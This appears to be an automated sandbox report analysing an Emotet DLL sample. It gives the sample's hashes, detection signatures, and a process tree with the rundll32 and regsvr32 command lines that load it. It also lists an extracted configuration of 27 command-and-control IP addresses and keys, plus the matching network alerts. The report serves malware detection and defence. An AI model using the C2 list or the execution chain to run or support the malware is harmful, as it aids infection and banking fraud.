Play interactive tour

Edit tour

Windows Analysis Report CSxylfUJcL

Overview

General Information

Sample Name:	CSxylfUJcL (renamed file extension from none to dll)
Analysis ID:	553113
MD5:	fa7ab814336d3ee4312c262457e01f01
SHA1:	73e1844abe6d99a57345464f418279d596985202
SHA256:	c89c49c3e8e37835ab53bfd9ff9ab97c80e037f0fdfe7e8df6a7d3d86fa62782
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Machine Learning detection for sample

Sigma detected: Suspicious Call by Ordinal

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

PE file contains strange resources

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Registers a DLL

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 7112 cmdline: loaddll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 7132 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 7160 cmdline: rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 7148 cmdline: regsvr32.exe /s C:\Users\user\Desktop\CSxylfUJcL.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 5820 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6172 cmdline: rundll32.exe C:\Users\user\Desktop\CSxylfUJcL.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5380 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ovttmq\chwg.qvw",xKUTPckNvcwxvZR MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5132 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ovttmq\chwg.qvw",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 5536 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5952 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3452 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6400 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6980 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.353899484.00000000047F1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.354941726.0000000005411000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.354039628.0000000004851000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.353678279.00000000046C1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.354572676.0000000005220000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.397064444.0000000002A80000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.354868089.00000000053E0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.354398198.00000000051C0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.354782751.00000000052B1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.353971003.0000000004820000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.354142339.0000000005110000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.353601392.0000000004690000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.397100803.0000000002AD1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.351221459.0000000004C01000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.350955081.0000000004A40000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.353804496.00000000047C0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.354700642.0000000005280000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.354625308.0000000005251000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.354494384.00000000051F1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.352946917.0000000004060000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.354257894.0000000005141000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.353590253.0000000004B30000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.396217963.0000000003230000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.353110002.0000000004191000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.rundll32.exe.5280000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.5110000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4690000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4b30000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.47c0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4820000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4060000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4820000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4060000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.3230000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.52b0000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.47f0000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4690000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.5410000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.4c00000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.2a80000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4190000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.47c0000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4b30000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.5220000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4850000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.5250000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.5280000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.53e0000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.4a40000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.46c0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4c70000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.51f0000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.51c0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.2a80000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4b80000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.5110000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.2ad0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.5140000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.51c0000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.53e0000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.5220000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.3230000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.4a40000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 34 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7132, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1, ProcessId: 7160

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.rundll32.exe.5280000.8.raw.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}

Multi AV Scanner detection for submitted file

Show sources

Source: CSxylfUJcL.dll	Virustotal: Detection: 21%			Perma Link
Source: CSxylfUJcL.dll	ReversingLabs: Detection: 32%

Machine Learning detection for sample

Show sources

Source: CSxylfUJcL.dll

Joe Sandbox ML: detected

Source: CSxylfUJcL.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.6:49766 -> 45.138.98.34:80
Source: Traffic	Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.6:49770 -> 69.16.218.101:8080

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.16.218.101 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.138.98.34 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 45.138.98.34:80
Source: Malware configuration extractor	IPs: 69.16.218.101:8080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.168.220:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 104.131.62.48:8080
Source: Malware configuration extractor	IPs: 62.171.178.147:8080
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 210.57.209.142:8080
Source: Malware configuration extractor	IPs: 159.69.237.188:443
Source: Malware configuration extractor	IPs: 116.124.128.206:8080
Source: Malware configuration extractor	IPs: 128.199.192.135:8080
Source: Malware configuration extractor	IPs: 195.154.146.35:443
Source: Malware configuration extractor	IPs: 185.148.168.15:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 190.90.233.66:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 104.131.62.48 104.131.62.48

Source: global traffic

TCP traffic: 192.168.2.6:49770 -> 69.16.218.101:8080

Source: unknown

Network traffic detected: IP country count 12

Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101

Source: svchost.exe, 00000015.00000003.484179843.000002DCEFD9B000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 00000015.00000003.484179843.000002DCEFD9B000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab

Source: rundll32.exe, 0000000C.00000003.461140176.0000000004DBF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globals
Source: svchost.exe, 00000015.00000002.501039542.000002DCEF4EA000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.863214782.000001B96A085000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000015.00000002.501039542.000002DCEF4EA000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.863099825.000001B96A013000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.12.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 0000000C.00000003.460557624.0000000004DF7000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ac3be1d532533
Source: svchost.exe, 00000015.00000003.480197283.000002DCEFD92000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: rundll32.exe, 0000000C.00000003.461301561.0000000004DED000.00000004.00000001.sdmp, rundll32.exe, 0000000C.00000003.460548550.0000000004DED000.00000004.00000001.sdmp, rundll32.exe, 0000000C.00000003.461164296.0000000004DED000.00000004.00000001.sdmp	String found in binary or memory: https://69dl.windowsupdate.com/
Source: svchost.exe, 00000015.00000003.480197283.000002DCEFD92000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000015.00000003.480197283.000002DCEFD92000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000015.00000003.480197283.000002DCEFD92000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000015.00000003.481145725.000002DCEFD82000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.481291827.000002DCF0202000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.481239356.000002DCEFDA4000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.481311470.000002DCEFD82000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.481252613.000002DCF0219000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_100012D0 recvfrom,

2_2_100012D0

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1000FF59 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		2_2_1000FF59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000FF59 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		3_2_1000FF59

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 4.2.rundll32.exe.5280000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5110000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4690000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.47c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4820000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4060000.0.unpack, type: UNPACKEDPE
